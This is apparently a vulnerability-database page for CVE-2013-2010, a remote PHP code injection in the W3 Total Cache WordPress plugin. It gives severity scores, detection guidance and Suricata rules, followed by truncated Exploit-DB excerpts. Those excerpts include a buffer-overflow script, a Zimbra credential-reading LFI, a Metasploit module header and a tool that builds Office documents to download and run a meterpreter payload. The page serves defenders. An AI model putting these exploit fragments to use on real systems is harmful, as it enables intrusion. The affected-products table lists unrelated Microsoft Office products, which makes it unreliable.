CVE-2013-2010
published 2020-02-12CVE-2013-2010: WordPress W3 Total Cache Plugin 0.9.2.8 has a Remote PHP Code Execution Vulnerability
PriorityP278critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
73.86%
99.4th percentile
WordPress W3 Total Cache Plugin 0.9.2.8 has a Remote PHP Code Execution Vulnerability
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| automattic | wp_super_cache | <= 1.2 | — |
| boldgrid | w3_total_cache | <= 0.9.2.8 | — |
| msrc | microsoft_365_apps_for_enterprise_for_32-bit_systems | — | — |
| msrc | microsoft_365_apps_for_enterprise_for_64-bit_systems | — | — |
| msrc | microsoft_excel_2010_service_pack_2 | — | — |
| msrc | microsoft_excel_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_excel_2013_service_pack_1 | — | — |
| msrc | microsoft_excel_2016 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | microsoft_office_2019_for_32-bit_editions | — | — |
| msrc | microsoft_office_2019_for_64-bit_editions | — | — |
| w3_total_cache_plugin_authors | w3_total_cache_plugin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation attempts by monitoring POST requests to wp-comments-post.php containing mfunc macro patterns in the comment body, which is the injection vector for arbitrary PHP code execution. ↗
- →Flag HTTP responses containing the X-Powered-By header matching 'W3 Total Cache/' with a version of 0.9.2.8 or lower as vulnerable targets. ↗
- →Detect the exploit's payload delivery phase by looking for HTTP requests to the cached post URI containing custom headers 'Cmd' (base64-encoded) and 'Sum', which are used to trigger and verify code execution. ↗
- →Monitor for HTTP responses containing the string 'Performance optimized by W3 Total Cache' or 'Cached page generated by WP-Super-Cache' as indicators of a potentially vulnerable plugin being active. ↗
- →Detect anonymous comment spam exploitation by monitoring POST requests to wp-comments-post.php that include randomly generated author, email, and URL fields alongside a comment containing PHP macro syntax (mfunc). ↗
- →Check for session cookies matching the pattern 'logged_in' in Set-Cookie headers following a POST to wp-login.php, indicating authenticated exploitation attempts. ↗
- ·Exploitation requires that the WordPress 'A comment is held for moderation' option is disabled; if moderation is enabled, the injected comment will not execute. ↗
- ·A valid post ID is required for exploitation. The module will bruteforce one if POSTID is not specified, meaning detection systems may observe sequential GET requests probing post IDs. ↗
- ·If anonymous comments are disabled on the WordPress installation, the attacker must supply valid credentials (USERNAME/PASSWORD), shifting the attack to an authenticated exploitation path. ↗
- ·WP Super Cache 1.2 or older is also reported as vulnerable to the same mfunc macro injection, so detection rules should cover both plugins. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_msrc7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29
CVE-2010-3333 ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Suricata
ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
suricata·2013-01-15
CVE-2010-0188 ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
Rule: alert http1 $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request"; flow:established,to_server; urilen:8; http.uri; pcre:"/\x2F[0-9]{3}\.pdf$/"; http.request_line; content:".pdf HTTP/1."; fast_pattern; reference:url,blogs.mcafee.com/mcafee-labs/red-kit-an-emerging-exploit-pack; reference:cve,2010-0188; classtype:exploit-kit; sid:2016210; rev:4; metadata:created_at 2013_01_15, cve CVE_2010_0188, performance_impact Moderate, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_07;)
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
exploitdb·2016-08-10·CVSS 7.8
CVE-2016-3313 [HIGH] Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
---
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
1) Introduction
Microsoft Word is a word processor developed by Microsoft. It was first re
Exploit-DB
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
exploitdb·2015-12-14
CVE-2015-6132 Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=556
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.
When a user op
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Zimbra 2009-2013 - Local File Inclusion
exploitdb·2013-12-06
CVE-2013-7091 Zimbra 2009-2013 - Local File Inclusion
Zimbra 2009-2013 - Local File Inclusion
---
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allo
Exploit-DB
PCMan FTP Server 2.0 - Remote Buffer Overflow
exploitdb·2013-06-30
CVE-2013-4730 PCMan FTP Server 2.0 - Remote Buffer Overflow
PCMan FTP Server 2.0 - Remote Buffer Overflow
---
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1
Exploit-DB
WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)
exploitdb·2013-05-01
CVE-2013-2010 WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)
WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Wordpress W3 Total Cache PHP Code Execution',
'Description' => %q{
This module exploits a PHP Code Injection vulnerability against Wordpress plugin
W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older
is also reported as vulnerable. The vulnerability is due to the handling of certain
macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is
needed in order to add the malicious comment. If th
Exploit-DB
Pwstore - Denial of Service
exploitdb·2013-04-16
CVE-2013-5657 Pwstore - Denial of Service
Pwstore - Denial of Service
---
source: https://www.securityfocus.com/bid/62112/info
pwStore is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the application, denying service to legitimate users.
pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
from sulley import *
import sys
import time
s_initialize("HTTP")
s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")
print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1"
Exploit-DB
Microsoft Office 2010 - Download Execute
exploitdb·2013-02-20
CVE-2010-3333 Microsoft Office 2010 - Download Execute
Microsoft Office 2010 - Download Execute
---
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in th
Metasploit
WordPress W3 Total Cache PHP Code Execution
metasploit
WordPress W3 Total Cache PHP Code Execution
WordPress W3 Total Cache PHP Code Execution
This module exploits a PHP Code Injection vulnerability against WordPress plugin W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older is also reported as vulnerable. The vulnerability is due to the handling of certain macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is needed in order to add the malicious comment. If the POSTID option isn't specified, then the module will automatically find or bruteforce one. Also, if anonymous comments aren't allowed, then a valid username and password must be provided. In addition, the "A comment is held for moderation" option on WordPress must be unchecked for successful exploitation. This module has been tested against WordPress 3.5 and W3 Total
http://packetstormsecurity.com/files/130999/WordPress-W3-Total-Cache-PHP-Code-Execution.htmlhttp://www.exploit-db.com/exploits/25137http://www.openwall.com/lists/oss-security/2013/04/24/9http://www.securityfocus.com/bid/59316http://packetstormsecurity.com/files/130999/WordPress-W3-Total-Cache-PHP-Code-Execution.htmlhttp://www.exploit-db.com/exploits/25137http://www.openwall.com/lists/oss-security/2013/04/24/9http://www.securityfocus.com/bid/59316
2020-02-12
Published